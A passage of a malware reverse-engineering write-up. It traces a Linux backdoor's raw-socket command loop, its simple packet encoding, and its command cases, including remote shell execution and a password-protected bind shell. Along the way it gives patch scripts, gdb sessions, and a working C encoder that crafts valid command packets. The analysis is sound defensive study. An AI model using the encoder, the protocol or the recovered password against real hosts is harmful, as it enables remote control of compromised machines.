.bss:0807E770*
.bss:0807E774*gPID2           dd ?
.bss:0807E774*
.bss:0807E778*gWord1          dd ?
.bss:0807E778*
.bss:0807E77C gDouble1        dd ?
.bss:0807E780*gbdaddr         dd ?
.bss:0807E780*
.bss:0807E784*gWord2_0_or_2   dd ?

which is a big improvement from the initial situation. We also recover some sense on the constants (.rodata segment) where we can recognize the "[mingetty]" string we saw on the "strings" analysis.

Overall, we can now start navigating our main function with a lot more clues than initially.

Reverse-Engineering the “initial steps” of the main function

With all the variables set, we're now ready to start looking at the assembly code and try to understand what it does.

The routine starts by preparing the stack, allocating space in it, and saving some registers. Next it initializes some variables and then does the check to see if it's running as root. If it's not it exits (position .text:08048186). We have already developed a patch to prevent this.

Next it seems that it's doing something strange, but a careful analysis reveals that it overwrites argv[0] (the string by which the program was invoked) with "[mingetty]". Obviously it tries to disguise itself. This also reinforces our idea that this is the "main()" function of the application, as the only parameter accessed corresponds to what we would expect (argv[0]).

After that it forks twice, with a call to setsid() in the middle, allowing only the child to continue execution each time. This converts the application into a daemon. We have also developed a patch to prevent this.

We're now at loc_0_804820C. Here the application does a chdir("/") and closes all the standard file descriptors (input, output and error), which is also a common practice in daemons.

Next it initializes some variables and does a call to an unknown function with time as a parameter. Like;

strange_function ( time() );

We don't know what this function does, and as its result (if it has any) seems to be completely ignored we will leave the function for the moment.

The next call is quite obvious and it brings us to the problem we found with the "socket" call. It is a call like this 

var_mainSD = socket(AF_INET, SOCK_RAW, 0Bh);

Opening raw sockets is only allowed to root, but we still don't know what this binary does, so we'll want to avoid using raw sockets. We'll deal with that shortly.

But first we see what else the application does. After opening the socket it ignores (by calling signal(xxx,SIG_IGN)) the signals SIGHUP (1), SIGTERM (0Fh) and SIGCHLD (11h, the signal 17 we saw in the fenris output). It assigns some pointer variables to point where they have to and then does;

"register esi" = recv (
      var_mainSD, &var_Buf, 2048, 0);
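
A word on the numbers: fenris prints values in decimal while the disassembly shows them in hexadecimal with an "h" suffix, so it is easy to mix them up when matching signal numbers. The small helper below (its name is ours) formats a number the way the listings in this document do, using the Linux/i386 signal numbers as examples.

```python
# Signal numbers on Linux/i386, in decimal.
LINUX_I386_SIGNALS = {"SIGHUP": 1, "SIGTERM": 15, "SIGCHLD": 17}

def ida_hex(value):
    """Format `value` like the disassembly listings: 1, 0Fh, 11h, 800h."""
    if value < 10:
        return "%d" % value
    digits = "%X" % value
    # A leading letter gets a 0 in front so that it still reads as a number.
    if digits[0] in "ABCDEF":
        digits = "0" + digits
    return digits + "h"

for name, number in sorted(LINUX_I386_SIGNALS.items()):
    print(name, number, ida_hex(number))
```

So the "SIGNAL 17 (Child exited)" of the fenris output appears as 11h in a push instruction, and the 2048-byte buffer length as 800h.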

Once this is done it does three checks on the received data;

If any of these conditions fails it goes to the end of a big loop where it does a "usleep(10000)" and goes back to the "recv" call we have already seen.

Once the checks are satisfied, it calls a function with the following parameters

decrypt_function ( esi-16h, var_BufDat2Ptr, var_2ndBufPtr);

Knowing that;

We can deduct that probably this function will transform all the bytes received in var_Buffer.Data, from the 3rd element to the end and leave the results of such transformation in "var_2ndBuf". Knowing the kind of binary we're talking about and (because it was announced in the challenge) that it has an "encryption" mechanism, we can be quite sure that this is the "decrypt_function".

After this transformation is done, the second byte of var_2ndBuf is used for a "case" statement with 12 different cases. So this byte has to have a value between 1 and 12 to execute one of the cases. If the value is not between these values the binary will jump to the default case, where (as we've seen before) it will "usleep(10000)" before going back to the "recv" call.

So to wrap up, the structure of the main function is approximately as follows;

main (int argc, char* argv[])
{
     INIT_VARIABLES;
     
     if ( geteuid()!= 0 ) error_exit(1);
     
     SET (argv[0] = "[mingetty]");
     
     signal ( SIGCHLD, SIG_IGN );
     if ( fork()!=0 ) error_exit(0);
     setsid();
     signal ( SIGCHLD, SIG_IGN );
     if ( fork()!=0 ) error_exit(0);
     chdir("/");
     close (stdin);
     close (stdout);
     close (stderr);
     
     INIT_MORE_VARS;
     
     strange_function ( time() );
     
     var_mainSD = socket (AF_INET, SOCK_RAW, 0Bh);
     
     signal ( SIGHUP, SIG_IGN );
     signal ( SIGTERM, SIG_IGN );
     signal ( SIGCHLD, SIG_IGN );

     INIT_EVEN_MORE_VARS;
     
     for (;;) {
          bytes_recv = recv (var_mainSD, &var_Buf, 2048, 0);
          if ((var_Buf.hdr.TOS==0Bh) && (var_Buf.data[0]==2) && (bytes_recv > 200)) {
               decrypt_function ( bytes_recv - 16h, &(var_Buf.data[2]), &var_2ndBuf );
               switch ( var_2ndBuf[1] ) {
                    case 1 : //SOMETHING
                    case 2 :
                    ..(etc).. up to
                    case 12: //SOMETHING
                         break;
                    default : ; 
               }
          }
          usleep(10000);
     }     
}

Now it would be nice to check all our assumptions. It would be good to see the execution of the binary providing some input that satisfies the first 3 checks and see what happens with the input provided (and what the decrypt_function does). But to do that we have to first solve a pending problem.

Avoiding recv on a Raw Socket 

Now we want to come back to what we saw happening with "socket" and "socketcall" quite a long time ago. We focus again on the code related to the "socket" and "recv" functions;

.text:0804825C                 push    0Bh
.text:0804825E                 push    3
.text:08048260                 push    2
.text:08048262                 call    socket
.text:08048267                 mov     [ebp+var_mainSD], eax
                  :
                  :
.text:080482B0                 push    0
.text:080482B2                 push    800h
.text:080482B7                 lea     eax, [ebp+var_Buf]
.text:080482BD                 push    eax
.text:080482BE                 mov     ecx, [ebp+var_mainSD]
.text:080482C4                 push    ecx
.text:080482C5                 call    recv

Which, as we've seen, translates to

var_mainSD = socket (AF_INET, SOCK_RAW, 0x0b);
                         :
recv (var_mainSD, &var_Buf, 2048, 0);

So the problem is that, without being root, we cannot open a Raw Socket and later on read information from it. Here one fast patch comes to mind. We know that previously the binary closes the standard file descriptors (standard input, output and error). The solution could be to use the standard input to "recv" the information.

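For that we do the following; we skip the close() of the standard input, we replace the call to "socket" with an instruction that leaves 0 (the descriptor of the standard input) as its result, and we make the call to "recv" go to "read" instead.

So our new "prepare-patch" script now looks like;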

#!/bin/sh
if [ "$1" = "" ] ; then echo "Output filename missing"; exit 1; fi
cp the-binary-dressed $1

# Run without being root
echo '0000182: 75' | xxd -r - $1

# Switch behaviour of parent and child on first fork
echo '00001DF: 75' | xxd -r - $1

# Switch behaviour of parent and child on second fork
echo '0000200: 75' | xxd -r - $1

# Avoid closing STDIN
echo '0000218: 9090 9090 90' | xxd -r - $1

# Substitute socket call for a xor ax,ax
echo '0000262: 6631 c090 90' | xxd -r - $1
# Read instead of recv on main()
echo '00002C6: 42F0' | xxd -r - $1

After applying it we're ready to send "packets" through the standard input and move forward.

Let's try our patch. We will generate a packet consisting of 256 bytes with the consecutive values from 0 to 255 (use your preferred way to achieve such a file). We will modify the bytes at offsets 09h and 14h so that it complies with the 3 checks we have seen before.

The prepared packet looks like this;

[tstusr@sandbox reverse]$ xxd tstpacket 
0000000: 0001 0203 0405 0607 080b 0a0b 0c0d 0e0f  ................
0000010: 1011 1213 0215 1617 1819 1a1b 1c1d 1e1f  ................
0000020: 2021 2223 2425 2627 2829 2a2b 2c2d 2e2f   !"#$%&'()*+,-./
0000030: 3031 3233 3435 3637 3839 3a3b 3c3d 3e3f  0123456789:;<=>?
0000040: 4041 4243 4445 4647 4849 4a4b 4c4d 4e4f  @ABCDEFGHIJKLMNO
0000050: 5051 5253 5455 5657 5859 5a5b 5c5d 5e5f  PQRSTUVWXYZ[\]^_
0000060: 6061 6263 6465 6667 6869 6a6b 6c6d 6e6f  `abcdefghijklmno
0000070: 7071 7273 7475 7677 7879 7a7b 7c7d 7e7f  pqrstuvwxyz{|}~.
0000080: 8081 8283 8485 8687 8889 8a8b 8c8d 8e8f  ................
0000090: 9091 9293 9495 9697 9899 9a9b 9c9d 9e9f  ................
00000a0: a0a1 a2a3 a4a5 a6a7 a8a9 aaab acad aeaf  ................
00000b0: b0b1 b2b3 b4b5 b6b7 b8b9 babb bcbd bebf  ................
00000c0: c0c1 c2c3 c4c5 c6c7 c8c9 cacb cccd cecf  ................
00000d0: d0d1 d2d3 d4d5 d6d7 d8d9 dadb dcdd dedf  ................
00000e0: e0e1 e2e3 e4e5 e6e7 e8e9 eaeb eced eeef  ................
00000f0: f0f1 f2f3 f4f5 f6f7 f8f9 fafb fcfd feff  ................

Now we have everything ready to run another test on the application. This time we will execute it under "gdb" up to the point just after the "decrypt_function" is called.

[tstusr@sandbox reverse]$ gdb the-binary-dressed-NOROOT-NOFORK1-NOFORK2-STDIN 
GNU gdb 5.0rh-5 Red Hat Linux 7.1
Copyright 2001 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...(no debugging symbols found)...
(gdb) break *0x08048311
Breakpoint 1 at 0x8048311
(gdb) run < tstpacket 
Starting program: /home/tstusr/reverse/the-binary-dressed-NOROOT-NOFORK1-NOFORK2-STDIN < tstpacket
warning: shared library handler failed to enable breakpoint

Breakpoint 1, 0x08048311 in ?? ()
(gdb) 

Now we look at the two buffers passed to the function. To do it we disassemble the call with its parameters to find out where exactly the buffers are.

(gdb) disassemble 0x080482fa 0x08048311
Dump of assembler code from 0x80482fa to 0x8048311:
0x80482fa:      mov    0xffffbb20(%ebp),%edx
0x8048300:      push   %edx
0x8048301:      mov    0xffffbb28(%ebp),%ecx
0x8048307:      push   %ecx
0x8048308:      lea    0xffffffea(%esi),%eax
0x804830b:      push   %eax
0x804830c:      call   0x804a1e8
End of assembler dump.
(gdb) x/w (0xffffbb28+$ebp)
0xbfffb63c:     0xbffff32a
(gdb) x/100hb 0xbffff32a
0xbffff32a:     0x16    0x17    0x18    0x19    0x1a    0x1b    0x1c    0x1d
0xbffff332:     0x1e    0x1f    0x20    0x21    0x22    0x23    0x24    0x25
0xbffff33a:     0x26    0x27    0x28    0x29    0x2a    0x2b    0x2c    0x2d
0xbffff342:     0x2e    0x2f    0x30    0x31    0x32    0x33    0x34    0x35
0xbffff34a:     0x36    0x37    0x38    0x39    0x3a    0x3b    0x3c    0x3d
0xbffff352:     0x3e    0x3f    0x40    0x41    0x42    0x43    0x44    0x45
0xbffff35a:     0x46    0x47    0x48    0x49    0x4a    0x4b    0x4c    0x4d
0xbffff362:     0x4e    0x4f    0x50    0x51    0x52    0x53    0x54    0x55
0xbffff36a:     0x56    0x57    0x58    0x59    0x5a    0x5b    0x5c    0x5d
0xbffff372:     0x5e    0x5f    0x60    0x61    0x62    0x63    0x64    0x65
0xbffff37a:     0x66    0x67    0x68    0x69    0x6a    0x6b    0x6c    0x6d
0xbffff382:     0x6e    0x6f    0x70    0x71    0x72    0x73    0x74    0x75
0xbffff38a:     0x76    0x77    0x78    0x79
(gdb) x/w (0xffffbb20+$ebp)
0xbfffb634:     0xbfffeb14
(gdb) x/100hb 0xbfffeb14
0xbfffeb14:     0xff    0xea    0xea    0xea    0xea    0xea    0xea    0xea
0xbfffeb1c:     0xea    0xea    0xea    0xea    0xea    0xea    0xea    0xea
0xbfffeb24:     0xea    0xea    0xea    0xea    0xea    0xea    0xea    0xea
0xbfffeb2c:     0xea    0xea    0xea    0xea    0xea    0xea    0xea    0xea
0xbfffeb34:     0xea    0xea    0xea    0xea    0xea    0xea    0xea    0xea
0xbfffeb3c:     0xea    0xea    0xea    0xea    0xea    0xea    0xea    0xea
0xbfffeb44:     0xea    0xea    0xea    0xea    0xea    0xea    0xea    0xea
0xbfffeb4c:     0xea    0xea    0xea    0xea    0xea    0xea    0xea    0xea
0xbfffeb54:     0xea    0xea    0xea    0xea    0xea    0xea    0xea    0xea
0xbfffeb5c:     0xea    0xea    0xea    0xea    0xea    0xea    0xea    0xea
0xbfffeb64:     0xea    0xea    0xea    0xea    0xea    0xea    0xea    0xea
0xbfffeb6c:     0xea    0xea    0xea    0xea    0xea    0xea    0xea    0xea
0xbfffeb74:     0xea    0xea    0xea    0xea
(gdb) 

As we expected, we see that the first buffer is our prepared packet starting at position 16h. The surprising result is that the second buffer comes back with a first byte of 255 (or -1) followed by bytes all set to 234 (or -22).

If we repeat the test stopping the execution before the call we see that the second buffer is filled with 0's, while later on it has again the first byte with the 255 value followed by exactly 234 bytes set to 234.

This means that var_2ndBuf[1] equals 234, which obviously falls outside the range of valid options for the "case" statement. So we have to go through our next step. 

Reverse-Engineering the “Decryption” function  

We will need to disassemble the "decrypt_function" to know how we have to "encrypt" the "packets" to send. 

To do this we start with the assembly of the function with the variables renamed (as we did in our "main" function). We then go step by step adding comments on what we can see the assembly code is performing. This brings us to the following commented assembly code;

Decrypt_Packet	proc near		; CODE XREF: main+1D8

var_10		= byte ptr -10h
var_LocBuffPtr	= dword	ptr -4
arg_length	= dword	ptr  8
arg_source	= dword	ptr  0Ch
arg_dest	= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		sub	esp, 4
		push	edi
		push	esi
		push	ebx
		mov	edi, [ebp+arg_length]
		lea	ebx, [edi-1]	; ebx =	ArgSize-1
		lea	eax, [edi+3]	; eax =	ArgSize+3
		and	al, 0FCh	; eax =	ArgSize	Rounded	up to *4
		sub	esp, eax	; We allocate arg_size rounded 
					; bytes	on the stack
		mov	[ebp+var_LocBuffPtr], esp
		mov	al, ds:gZero
		mov	esi, [ebp+arg_dest]
		mov	[esi], al	; dest[0]=gZero
		test	ebx, ebx
		jl	EmptyBuffer	; if (ArgSize-1<0) goto	...

repeat:					; CODE XREF: Decrypt_Packet+AD
		lea	edx, [ebx-1]	; edx =	ebx - 1
		test	ebx, ebx
		jz	short last_char	; if (ebx==0)
		mov	esi, [ebp+arg_source]
		movzx	eax, byte ptr [ebx+esi]
		movzx	edx, byte ptr [edx+esi]
		sub	eax, edx	; eax =	source[ebx]-source[ebx-1]
		jmp	short not_last_char
; ---------------------------------------------------------------------------
		align 4

last_char:				; CODE XREF: Decrypt_Packet+31
		mov	esi, [ebp+arg_source]
		movzx	eax, byte ptr [esi] ; eax=source[0]

not_last_char:				; CODE XREF: Decrypt_Packet+40
		lea	ecx, [eax-17h]	; ecx =	eax - 17h
		test	ecx, ecx
		jge	short more_thn_17
		lea	esi, [esi+0]

weird_loop???:				; CODE XREF: Decrypt_Packet+5A
		add	ecx, 100h
		js	short weird_loop???

more_thn_17:				; CODE XREF: Decrypt_Packet+4F
		xor	edx, edx
		cmp	edx, edi	; cmp argSize,0
		jge	short none_left
		lea	esi, [esi]

for_loop:				; CODE XREF: Decrypt_Packet+73
		mov	esi, [ebp+arg_dest]
		mov	al, [edx+esi]	; al=dest[edx]
		mov	esi, [ebp+var_LocBuffPtr]
		mov	[edx+esi], al	; locBuf[dx]=dest[dx]
		inc	edx
		cmp	edx, edi	; for (dx=0;dx<di;dx++)
					;    locBuff[dx]=Dest[dx]
		jl	short for_loop

none_left:				; CODE XREF: Decrypt_Packet+60
		mov	esi, [ebp+arg_dest]
		mov	[esi], cl	; dest[0]=cl
		mov	edx, 1
		cmp	edx, edi	; cmp edi,1
		jge	short one_left
		nop	

scndFor_loop:				; CODE XREF: Decrypt_Packet+94
		mov	esi, [ebp+var_LocBuffPtr]
		mov	al, [edx+esi-1]
		mov	esi, [ebp+arg_dest]
		mov	[edx+esi], al	; dest[edx]=locBuff[edx-1]
		inc	edx
		cmp	edx, edi	; for (edx=1;edx<edi;edx++)
					;   dest[edx]=locBuf[edx-1]
		jl	short scndFor_loop

one_left:				; CODE XREF: Decrypt_Packet+81
		mov	esi, [ebp+var_LocBuffPtr]
		push	esi
		push	ecx
		push	offset aCS	; "%c%s"
		mov	esi, [ebp+arg_dest]
		push	esi
		call	asprintf___err___errx___fprintf___sprintf___sscanf___syslog
		add	esp, 10h
		dec	ebx
		jns	repeat		; repeat until all processed

EmptyBuffer:				; CODE XREF: Decrypt_Packet+26
		lea	esp, [ebp+var_10]
		pop	ebx
		pop	esi
		pop	edi
		mov	esp, ebp
		pop	ebp
		retn	
Decrypt_Packet	endp 

Now that we have it all commented we try to transform it into some kind of pseudo-C code to have a better view of what is done. We end up with something like this;

void Decrypt_packet (int size, unsigned char *source, char *dest)
{
   char     LocBuff[2048]; //Really allocated on the stack ("size" rounded up to *4)
   char     *LocBuffPtr;
   int      index, tmp;
   int      ch;
	
   LocBuffPtr = LocBuff;
   dest[0] = gZero;   //Global byte

   index = size - 1;
   while (index>=0) {

       if (index==0) ch = source[0];
       else ch = source[index] - source[index-1];

       ch = ch - 0x17;
       while (ch<0) ch = ch + 0x100;   //The "weird_loop???" of the assembly

       for (tmp=0;tmp<size;tmp++) LocBuffPtr[tmp]=dest[tmp];

       dest[0]=ch;
					
       for (tmp=1;tmp<size;tmp++) dest[tmp]=LocBuffPtr[tmp-1];
		
       sprintf ( dest, "%c%s", ch, LocBuffPtr ); 
       index--;
   }
}

Now we can see that the algorithm is an extremely inefficient (and quite difficult to reverse-engineer) version of the following algorithm;

void Decrypt_packet (int size, unsigned char *source, unsigned char *dest)
{
	int	index;
	
	dest[0]=source[0] - 0x17;
	for (index=1; index < size; index ++) {
		dest[index] = source[index] - source[index-1] - 0x17;
	}
}

If we work out the result of Decrypt_packet() applied to our "test" packet, we see immediately that it is the one we got. Each byte is replaced by its difference with the previous byte minus 17h, which is why we got all those "234" values; the difference was always 1, and 1-17h=-16h, which on a byte is represented as EAh (100h-16h) or 234. 

The fact that the algorithm was coded so strangely makes us think that it may have been written this way just to try to prevent reverse-engineering. The other option is that the programmer wasn't good at programming and he/she was just a "script kiddie", but given the advanced topics covered in this binary and the coding of the rest of the application, this option doesn't seem probable.

Trying to get results out of "the-binary"

Now that we know how the decryption process works, we can prepare a new "packet" that goes through all the tests and jumps to the "case" statement that we want!

To do that we prepare a simple program that prepares a "packet" with one "command" or "case value" to jump to.

#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>

char    header[0x17]={1,2,3,4,5,6,7,8,9,0xb,11,12,13,14,15,16,
                      17,18,19,20,0x2,22,00}; //includes 1st encoded byte (00)

int main(int argc, char** argv)
{
        char    ch,prev;
        char    command;

        if (argc < 2) {
                fprintf(stderr,"Usage: %s command <payload >packet\n",argv[0]);
                return(1);
        }
        command = atoi(argv[1]);

        //Write header
        write(1,header,sizeof(header));

        //Write "encoded" Command (the previous byte is the 00 of the header)
        ch = command + 0x17;
        write(1,&ch,1);
        prev = ch;

        //Write encoded data, stopping at end of file or on a read error
        while (read(0,&ch,1) == 1) 
                {
                ch = prev + ch + 0x17;
                write(1,&ch,1);
                prev = ch;
                }
        return(0);
}

Now we can prepare a "command-packet" using a "payload" file named 256bytes.dat consisting of the values from 0 to FFh consecutively;

[tstusr@sandbox reverse]$ gcc -Wall -o encrypt encrypt.c 
[tstusr@sandbox reverse]$ ./encrypt 1 <256bytes.dat >command1.pkt

We can now check with gdb that everything goes fine. We'll use this "command1.pkt" to see if we really jump to "case 1". For that we start gdb, set a breakpoint just after the "movzx eax,[ebp+var_2ndBuf+1]" and check that eax has a value of "1".

[tstusr@sandbox reverse]$ gdb the-binary-dressed-NOROOT-NOFORK1-NOFORK2-STDIN 
GNU gdb 5.0rh-5 Red Hat Linux 7.1
Copyright 2001 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...(no debugging symbols found)...
(gdb) break *0x804831b
Breakpoint 1 at 0x804831b
(gdb) run < command1.pkt 
Starting program: /home/tstusr/reverse/the-binary-dressed-NOROOT-NOFORK1-NOFORK2-STDIN < command1.pkt
warning: shared library handler failed to enable breakpoint

Breakpoint 1, 0x0804831b in ?? ()
(gdb) info registers eax
eax            0x1      1
(gdb) 

We can also check that our 256 bytes of payload have arrived perfectly;

(gdb) x/258hb 0xbfffeb14
0xbfffeb14:     0xe9    0x01    0x00    0x01    0x02    0x03    0x04    0x05
0xbfffeb1c:     0x06    0x07    0x08    0x09    0x0a    0x0b    0x0c    0x0d
0xbfffeb24:     0x0e    0x0f    0x10    0x11    0x12    0x13    0x14    0x15
0xbfffeb2c:     0x16    0x17    0x18    0x19    0x1a    0x1b    0x1c    0x1d
0xbfffeb34:     0x1e    0x1f    0x20    0x21    0x22    0x23    0x24    0x25
0xbfffeb3c:     0x26    0x27    0x28    0x29    0x2a    0x2b    0x2c    0x2d
0xbfffeb44:     0x2e    0x2f    0x30    0x31    0x32    0x33    0x34    0x35
0xbfffeb4c:     0x36    0x37    0x38    0x39    0x3a    0x3b    0x3c    0x3d
0xbfffeb54:     0x3e    0x3f    0x40    0x41    0x42    0x43    0x44    0x45
0xbfffeb5c:     0x46    0x47    0x48    0x49    0x4a    0x4b    0x4c    0x4d
0xbfffeb64:     0x4e    0x4f    0x50    0x51    0x52    0x53    0x54    0x55
0xbfffeb6c:     0x56    0x57    0x58    0x59    0x5a    0x5b    0x5c    0x5d
0xbfffeb74:     0x5e    0x5f    0x60    0x61    0x62    0x63    0x64    0x65
0xbfffeb7c:     0x66    0x67    0x68    0x69    0x6a    0x6b    0x6c    0x6d
0xbfffeb84:     0x6e    0x6f    0x70    0x71    0x72    0x73    0x74    0x75
0xbfffeb8c:     0x76    0x77    0x78    0x79    0x7a    0x7b    0x7c    0x7d
0xbfffeb94:     0x7e    0x7f    0x80    0x81    0x82    0x83    0x84    0x85
0xbfffeb9c:     0x86    0x87    0x88    0x89    0x8a    0x8b    0x8c    0x8d
0xbfffeba4:     0x8e    0x8f    0x90    0x91    0x92    0x93    0x94    0x95
0xbfffebac:     0x96    0x97    0x98    0x99    0x9a    0x9b    0x9c    0x9d
0xbfffebb4:     0x9e    0x9f    0xa0    0xa1    0xa2    0xa3    0xa4    0xa5
0xbfffebbc:     0xa6    0xa7    0xa8    0xa9    0xaa    0xab    0xac    0xad
0xbfffebc4:     0xae    0xaf    0xb0    0xb1    0xb2    0xb3    0xb4    0xb5
0xbfffebcc:     0xb6    0xb7    0xb8    0xb9    0xba    0xbb    0xbc    0xbd
0xbfffebd4:     0xbe    0xbf    0xc0    0xc1    0xc2    0xc3    0xc4    0xc5
0xbfffebdc:     0xc6    0xc7    0xc8    0xc9    0xca    0xcb    0xcc    0xcd
0xbfffebe4:     0xce    0xcf    0xd0    0xd1    0xd2    0xd3    0xd4    0xd5
0xbfffebec:     0xd6    0xd7    0xd8    0xd9    0xda    0xdb    0xdc    0xdd
0xbfffebf4:     0xde    0xdf    0xe0    0xe1    0xe2    0xe3    0xe4    0xe5
0xbfffebfc:     0xe6    0xe7    0xe8    0xe9    0xea    0xeb    0xec    0xed
0xbfffec04:     0xee    0xef    0xf0    0xf1    0xf2    0xf3    0xf4    0xf5
0xbfffec0c:     0xf6    0xf7    0xf8    0xf9    0xfa    0xfb    0xfc    0xfd
0xbfffec14:     0xfe    0xff

The first byte is the last 00 that we had on the "header" of our application, and the second is the command itself. After that come our 256 bytes exactly as we had them before going through our "encrypt" program.

We can also provide the binary with more than one packet. We have to consider the fact that our "recv" will in fact read at most 2048 bytes of stdin. So if we want to provide more than 1 packet we just have to make sure that all the packets are 2048 bytes in length (except the last that can be any size).

We will do it by preparing an input file with one "command 1" and one "command 2" packet.

[tstusr@sandbox reverse]$ ./encrypt 2 <256bytes.dat >command2.pkt
[tstusr@sandbox reverse]$ cp command1.pkt command1.2048.pkt
[tstusr@sandbox reverse]$ echo '00007ff: 00'| xxd -r - command1.2048.pkt 
[tstusr@sandbox reverse]$ cp command2.pkt command2.2048.pkt
[tstusr@sandbox reverse]$ echo '00007ff: 00'| xxd -r - command2.2048.pkt 
[tstusr@sandbox reverse]$ ls -l command?.2048.pkt
-rw-rw-r--    1 tstusr   tstusr       2048 May 30 01:25 command1.2048.pkt
-rw-rw-r--    1 tstusr   tstusr       2048 May 30 01:25 command2.2048.pkt
[tstusr@sandbox reverse]$ cat command1.2048.pkt command2.2048.pkt > command1-2.pkt

Now we can test that effectively we read two packets and that both "jump" to their corresponding "case" statement with gdb;

[tstusr@sandbox reverse]$ gdb the-binary-dressed-NOROOT-NOFORK1-NOFORK2-STDIN 
GNU gdb 5.0rh-5 Red Hat Linux 7.1
Copyright 2001 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...(no debugging symbols found)...
(gdb) break *0x804831b
Breakpoint 1 at 0x804831b
(gdb) run < command1-2.pkt 
Starting program: /home/tstusr/reverse/the-binary-dressed-NOROOT-NOFORK1-NOFORK2-STDIN < command1-2.pkt
warning: shared library handler failed to enable breakpoint

Breakpoint 1, 0x0804831b in ?? ()
(gdb) info registers eax
eax            0x1      1
(gdb) cont
Continuing.

Breakpoint 1, 0x0804831b in ?? ()
(gdb) info registers eax
eax            0x2      2
(gdb)

All good! We have checked that BOTH packets have been read and that the "command" has arrived at its destination. The question that arises now is; what has happened inside the "case 1"? And what would happen if we instruct gdb to "cont" again?

One thing worth mentioning here is that while doing all these tests we've had our sniffer up and running all the time and it hasn't registered any activity coming from the binary.

It's time to find out its capabilities.

Reverse-Engineering the "cases" in the "Main loop"

To do this we will proceed in a similar way as we did to reverse-engineer the decryption function. We start from the assembly code with as many variables identified and as many comments as possible, and try to end up with Pseudo-C code that allows us to understand what the 12 "cases" or "commands" do. The result is as follows;

case1:	var_Buf.hdr.ihl_version = 0;
	var_Buf.hdr.ihl_version = gDouble1;
	var_Buf.hdr.TOS = 1;
	var_Buf.hdr.len = 7;
	if (gPID2 == 0) var_Buf.hdr.len+1 = 0;
	else {
		var_Buf.hdr.len+1 = 1;
		var_Buf.hdr.id = g_LastCommand;
	}

	Encrypt_Packet (400, &var_Buf, &var_2ndBuf);
	fun1 ( var_AddrPtr, &var_2ndBuf, 400 + (rand??_caller() mod 201));
	break;

case2:	gWord2_0_or_2 = var_2ndBuf[2];
	gbdaddr = var_Buf.hdr.daddr;
	randomize??(time(0));

	esi=0;
	edi=rand??_caller mod 10;

	for (ebx=0; ebx<=9; ebx++) {
		if (ebx!=edi) {
			if (gWord2_0_or_2 == 2) {
				var_Addr[esi..esi+3]=var_2ndBuf[ebx*4+3..ebx*4+6]
			} 
			else {
				var_Addr[esi..esi+3]=byte(SOMEWEIRDRANDOMVALUE);
			}//if (gWord2_0_or_2==2)
		} //if (ebx!=edi)
		esi +=4 ;
	} 
	if (gWord2_0_or_2 != 2) {
		if (gWord2_0_or_2 != 0) edi=0;
		edi = edi*4;
		var_0Value? = edi;
		var_Addr[edi] = var_2ndBuf[3..6];
	}
	break;
	//Fills the "var_Addr[10]" array. It's an array of 10 addresses
	//If gWord2_0_or_2 == 2 it gets everything from the 2ndBuf, except one of the addresses that's left intact
	//If gWord2_0_or_2 == 0 it fills everything with random values except the "random hole" of the array, which is set to the first value passed on 2ndBuf[3..6]
	//If gWord2_0_or_2 == other it fills everything with random values except the first value, which is set to the first value passed on 2ndBuf[3..6]

case3:		
	gPID = fork();
	if (gPID==0) {//child
		setsid()
		signal(sigChild,1);
		if (fork()!=0) { //parent
			sleep(10);
			kill (gpid, SIGKILL); //???? Does it kill anyone??? gpid=0!!!
			_called_to_exit(0);
		}
		for (ebx=0;ebx<398;ebx++)
			Buf2[ebx]=Buf2[ebx+2]; 

		sprintf(Buffer, "/bin/csh -f -c \"%s\" 1> %s 2>&1",Buf2, "/tmp/.hj237349");

		EXECUTES IT

		OPEN (tmp)
		while 
			READS tmp file
			Encrypts
			FUN1_sends it to (var_AddrPtr, 44E8Buffer, (rand()mod 201) +400);
		endwhile;
		exit(0);
	};
	break;

case4:		
	if (gPID2==0) {
		gLastCommand = 4;
		gPID2 = fork();
		if (gPID2==0) {
			var_buf256Bytes[0..255]=var_Buf2[0..255];
			var_buf256Bytes[0..255]=var_buf256Bytes[0+9..255+9];
			Loc_Fun_4 ( var_Buf2[2,3,4,5],0,var_Buf2[6,7,8],&var_buf256Bytes);
			//gPID2=0 in Loc_Fun_4
			exit(0);
		}
	}

case5:	
	if (gPID2==0) {
		gLastCommand = 5;
		gPID2 = fork();
		if (gPID2==0) {
			var_Buf256Bytes[0..255]=Buf2[0..255];
			var_Buf256Bytes[0..255]=var_Buf256Bytes[0+13..255+13];
			Loc_Fun_6 ( var_Buf2[2,3,4,5,6,7,8,9,10,11,12],&var_buf256Bytes);
			//gPID2=0 inside Loc_Fun_6
			exit(0);
		}
	}

case6:					
	if (gpid2==0) {
		gLastCommand = 6;
		signal(SIGCHLD,SIG_IGN);
		gPID2=fork();
		if (gPID2==0) {
			setsid();
			signal(SIGCHLD,SIG_IGN);
			var_bindSockAddr.sin_family = AF_INET;
			var_bindSockAddr.s_addr=0F15Ah;
			var_bindSockAddr.s_addr+2=0
			var_setsockopt_optval=1
			var_SD = socket (AF_INET,SOCK_STREAM,0);
			signal (SIGCHLD,SIG_IGN);
			signal (SIGCHLD,SIG_IGN);
			signal (SIGHUP,SIG_IGN);
			setsockopt(var_mainSD, SOL_SOCKET, SO_REUSEADDR,&var_setsockopt_optval);
			bind(var_SD,&var_bindSockAddr,16);
			listen(var_SD,3);
			do {
				var_FD = accept(var_SD,&var_AcceptSockAddr, &var_AcceptAddrLen);
				if (var_FD==0) exit(0);
			} while(fork()==0);
			recv (var_FD, &var_TCPRecvBuf,19,0);
			for (bx=0;bx<=18;bx++) {
				if (var_TCPRecvBuf[bx]==(LineFeed|CR)) var_TCPRecvBuf[bx]=0;
				else var_TCPRecvBuf[bx]++;
			}
			if (var_TCPRecvBuf!="TfOjG") {
				send(var_FD,gPwdFailedRespo,4,0);
				close(var_FD);
				exit(1);
			}
			dup2(var_FD,0);
			dup2(var_FD,1);
			dup2(var_FD,2);
